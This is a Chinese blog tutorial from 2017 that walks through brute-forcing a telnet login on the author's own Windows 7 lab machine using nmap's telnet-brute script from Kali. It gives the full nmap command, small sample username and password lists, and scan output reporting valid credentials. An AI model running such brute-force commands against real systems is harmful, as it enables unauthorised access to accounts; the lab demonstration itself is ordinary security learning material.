1. 程式人生 > >【20171115中】nmap 使用腳本爆破telnet密碼

【20171115中】nmap 使用腳本爆破telnet密碼

pts style logs images lan clas ip add bbbb 提升

今天老黑走出了低谷,設置了懲罰機制後效率提升了很多,現在寫一個使用nmap檢測目標主機漏洞和利用漏洞的文章,話不多說,直接開始!

0x01:環境介紹

  主機A:系統 - kali2017,IP - 192.168.1.104

  主機B:系統 - win7x64,IP - 192.168.1.103

  使用主機A掃描並攻入主機B

0x02:確認主機B開啟了telnet的23端口

  主機B沒有開啟,我自己開啟一下。

  s1:控制面板 -> 程序 -> 打開或關閉windows程序 -> 選中下圖選項框,點擊確認後重啟系統。

技術分享

  s2:確認計算機telnet服務是否已經開啟。打開計算機右擊 -> 管理 -> 服務和應用程序 -> 服務 -> 找到Telnet服務,並將其開啟服務和設置自動

0x03:在主機A掃描確認主機B是否開啟了23端口

  技術分享

0x04:進行爆破

  s1:參考官網了解,爆破命令如下

nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>

  s2:制造自己的myusers.lst和mypwds.lst

    老黑將自己的賬號AAAA放在myusers.lst中,如下:

    

AAAA
AA22
ASDFSA
SDSDD

    將自己的密碼BBBB放在mypwds.lst中,如下:

BBBB
BB23
DFASDFA
SADFAA

    根據主機A的環境,調整命令,如下:

nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

  s3:執行命令,等待結果

root@l:~# nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-15 18:18 CST
Nmap scan report for promote.cache-dns.local (192.168.1.103)
Host is up (0.091s latency).

PORT   STATE SERVICE
23/tcp open  telnet
| telnet-brute: 
|   Accounts: 
|     AAAA:BBBB - Valid credentials
|_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
MAC Address: XXXXXXXXXXXXX (xxxxxxxxxxxx.)

Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds

  技術分享

0x05:telnet登陸主機B,WELL DONE!

技術分享

【20171115中】nmap 使用腳本爆破telnet密碼